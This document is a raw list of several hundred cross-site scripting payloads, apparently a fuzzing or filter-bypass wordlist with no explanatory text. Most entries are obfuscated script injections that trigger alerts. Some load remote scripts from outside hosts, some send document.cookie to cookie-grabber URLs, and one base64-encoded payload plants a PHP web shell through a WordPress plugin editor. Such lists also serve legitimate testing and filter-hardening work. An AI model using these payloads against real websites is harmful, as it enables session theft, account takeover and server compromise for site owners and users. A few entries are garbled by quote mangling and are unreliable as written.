<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<script>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://www.securitycompass.com/xss.js"></script>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
<script>document.write(String.fromCharCode(b??WAN?));</script>
<script>document.write(String.fromCharCode(xss));</script>
<script>document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);</script>
<script>document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);</script>
<SCRIPT>document.write(“XSS”);</SCRIPT>
<SCRIPT>document.write(“XSS”);</SCRIPT>
<script>’e1v2a3l’.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })</script>
<script>eval(“\141\154\145\162\164`1`”)</script>
<script>eval(“\141\154\145\162\164`1`”)</script> // Octal escapes combined ES6 Diacritical Grave
<script>eval(“\61\6c\65……”);<script>
<script>eval.call`${‘prompt\x281)’}`</script>
<script>eval(location.hash)</script> (Firefox)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash.slice(1))</script>#alert(1)
<script>eval(location.hash.slice(1))</script>#alert(a)
<script>eval_r(z)</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
<script>eval(‘\\u’+’0061'+’lert(1)’)</script>
<script>eval(“\x61\x6c\x65\x72\x74(1)”);</script>
<script>eval(“\x61\x6c\x65\x72\x74(1)”);</script> // Hexadecimal escapes using eval
<script>eval(z)</script>
<script>f=document.createElement(“iframe”);f.id=”pwn”;f.src=”/robots.txt”;f.onload=()=>{x=document.createElement(‘script’);x.src=’//bo0om.ru/csp.js’;pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
<script firefox>alert(1)</script>
<script>foo</script>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<script for=document event=onreadystatechange>getElementById(‘safe123’).click()</script>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
<script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=>
<script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
<script>for((i)in(self))eval(i)(1)</script>
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
<script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
<script> (function (o) { function exploit(x) { if (x !== null) confirm(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<script>history.pushState(0,0,’/i/am/somewhere_else’);</script>
‘“</Script><Html /Onmouseover=(alert)(1) //
<script?=”>”?=”http://yoursite.com/xss.js?69,69"></script>
<SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
<SCRIPT id=XSS SRC=”http://xxxx.com/xss.jpg"></SCRIPT>
<SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
<SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
<script>if(top!=self)top.location=location</script>
<script>if(“x\*chr*”.length==1) { log(*num*);}</script>
<script>if(“x\\xE0\xB9\x92”.length==2) { javascript:alert(1);}</script>
<script>if(“x\\xE1\x96\x89”.length==2) { javascript:alert(1);}</script>
<script>if(“x\\xEE\xA9\x93”.length==2) { javascript:alert(1);}</script>
</script><img/*%00/src=”worksinchrome&colon;prompt(1)”/%00*/onerror=’eval(src)’>
</script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/%00*/onerror=’eval(src)’>
<script/img>alert(199)</script/>
</script><img/*/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/*/onerror=’eval(src)’>
<script+&injection=>alert(1)></script>
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
<script itworksinallbrowsers>/*<script* */alert(1)</script
<script itworksinallbrowsers>/*<script* */alert(1)</script
<script itworksinallbrowsers>/*<script* */confirm(1)</script ?
<script itworksinallbrowsers>/*<script* */confirm(1)</script
<script>javascript:alert(1)</script>
“`’><script>-javascript:alert(1)</script>
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)<\x00/script>
<script>//jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
<script>/*jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
‘“”><script language=”JavaScript”> alert(‘X \nS \nS’);</script>
‘“”><script language=”JavaScript”> alert(‘X nS nS’);</script>
<script language=”JavaScript”>alert(‘XSS’)</script>
<script language=’javascript’ src=’%(jscript)s’></script>
<SCRIPT LANGUAGE=”VBScript”>%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>
<script language=vbs></script><img src=xx:x onerror=”::alert’ @insertScript ‘::”>
scriptlet.html”></LAYER>
<scriptlet> <implements type=”behavior”/><script>alert(1)</script></scriptlet>
<script>let{location={href:’http://evil.com/ ‘}}=0;alert(location.href);</script>
<script> location.href = ‘data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=’; </script>
<script>location.href=decodeURIComponent(location.hash.slice(1));</script>
<script>location.href=’http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
<script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<script>location.href;’javascript:alert(1)’</script>
<script>location.href;’javascript:alert%281%29'</script>
“`’><script>lo*chr*g(*num*)</script>
<script>logChr(0)</script>
<script> logChr0x09(1); </script>
“‘`><script>log*chr*(*num*)</script>
‘/<\/?(script|meta|link|frame|iframe).*>/Uis’,
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new function(){new.target.constructor(‘alert(1)’)();}</script>
<script>new Image()[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)</script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
<script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});alert(Safe.get())</script>
<script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});confirm(Safe.get())</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)()</script>
<script/onload=confirm(1)></script>
<script onLoad script onLoad=”javascript:javascript:alert(1)”></script onLoad>
<script/onreadystatechange=alert(1)>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<script onReadyStateChange script onReadyStateChange=”javascript:javascript:alert(1)”></script onReadyStateChange>
<script>parent[‘alert’](1)</script>
<script>%(payload)s</script>
<<SCRIPT>%(payload)s//<</SCRIPT>
<script>Promise.reject(“1”).then(null,alert)</script>
<script>prompt(1234)</script>
<*script>prompt(123)<*/script>
‘ →”>’>’”<script>prompt(198)</script>;” f0r=TRUE
< s c r i p t > p r o m p t ( 1 ) < / s c r i p t >
<script>prompt(1)</script>
<script>prompt(1);</script>
“><script>`#${prompt(1)}#`</script>
\”><script>prompt(1)</script>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script>
<script>prompt(88199)</script>
<script>prompt.call`${1}`</script>
<script>prompt(-[])</script>
scriptprop={{_factory}}
<script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>
<script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script>
<script>ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x</script>
<script>Reflect.construct(function(){new.target.constructor(‘alert(1)’)()},[])</script>
<script/renwa~~~>;alert(1);</script/X~~~>
<script>(()=>{return this})().alert(1)</script>
<script>RuntimeObject(“w*”)[“window”][“alert”](1);</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
<script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();</script>
</script><script>’%0A’-alert(1)//
</script><script>alert(0x000123)</script>
\”></script><script>alert(0x000123)</script>
\”></sCriPt><sCriPt >alert(0x000123)</sCriPt>
< / script >< script >alert(123)< / script >
</script><script>alert(123)</script>
<;/script>;<;script>;alert(1)<;/script>;
</script><script>alert(1)</script>
</script><script>alert(1)</script>
</script><script >alert(document.cookie)</script>
// →</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
‘</script><script>alert(String.fromCharCode(88,83,83))</script>/
‘;</script>”>’><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
</script><script>alert(XSS by Shawar)</script>
</script><script>alert(��Xss��)</script>
</script><script>alert(Xss)</script>
</script><script>alert(‘XSS’);</script>
</script><script>confirm(3)</script>
</SCRIPT>”>’><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
</script><script>prompt(“test”)</script>
;<><script></script>/<script>alert(‘0’)</script>
<</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
</script></script><<<<script><>>>><<<script>alert(XSS)</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</script><script>/*var a=”/*””’/**/;confirm(1);//</script>
<script>self[‘alert’](2)</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>setTimeout(‘alert(1)’,0)</script>
<script>setTimeout(“a” + “lert” + “(1)”);</script>
<script>setTimeout(“a” + “lert” + “(1)”);</script> // Using Basic Concatenation
<script>setTimeout(alert(88199),0)</script>
<script>setTimeout(/a/.source + /lert/.source + “(1)”);</script>
<script>setTimeout(/a/.source + /lert/.source + “(1)”);</script> // Using source property for concatenation
<script>setTimeout(location)</script>, use: <a href=”//target#&#8232;alert(1)”>CLICK</a>
<script> … setTimeout(\”writetitle()\”,$_GET[xss]) … </script>
(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
<script/src=//?.?>
script/src=//??
<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<script src=1 href=1 onerror=”javascript:alert(1)”></script>
<script src=’1.js’></script>
<script src=//3334957647/1>
<script src=”//aEa?L”></script>)
<script src=”#”>{alert(1)}</script>;1
<script src=//brutelogic.com.br/1>
<script src=//brutelogic.com.br/1.js>
<script src=//brutelogic.com.br/1.js>
<script src=”//brutelogic.com.br/1.js#
“><script src=//brutelogic.com.br/1.js#
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
<script src=”//brutelogic.com.br&sol;1.js&num;
<script src=”//brutelogic.com.br&sol;1.js&num;
“><script src=//brutelogic.com.br&sol;1.js&num;
“><script src=//brutelogic.com.br&sol;1.js&num;
<script src=/bypass/usercontent/xss.js></script>
<script src=>confirm(8)</script>
<script src=”data:%26comma;alert(1)//
<script src=data:%26comma;alert(1)//
“><script src=data:%26comma;alert(1)-”
“><script src=data:%26comma;alert(1)//
<script src=”data:%26comma;alert(1)%26sol;%26sol;
<script src=data:%26comma;alert(1)%26sol;%26sol;
<SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT>
<SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)
<script/src=data:,alert()>
<script src=”data:,alert(1)//
<script src=data:,alert(1)>
“><script src=data:,alert(1)//
<script src=”data:,alert(1)%250A →
<script src=data:,alert(1)></script>
<script src=”data:,alert(64)%250A →
<script src=data:,alert(document.cookie)></script>
<script src=”data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==”></script>
<script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
<script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
“/><script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
<script src=”data:&comma;alert(1)//
“><script src=data:&comma;alert(1)//
<script/src=”data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
<script+src=data:,confirm(1)<! —
“/><script+src=data:,confirm(1)<! —
<script/src=”data:,eval(atob(location.hash.slice(1)))//#
<script/src=”data:,eval(atob(location.hash.slice(1)))//##eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3BsdWdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5waHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0nX3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRVRbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpDQp4LnNlbmQoJCk=
<script/src=data:&p=alert(50)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=”data:text/html;base64,YWxlcnQoMSk=”></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=”data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=”data:text/javascript,alert(1)”></script>
<script src=data:text/javascript,alert(88199)></script>
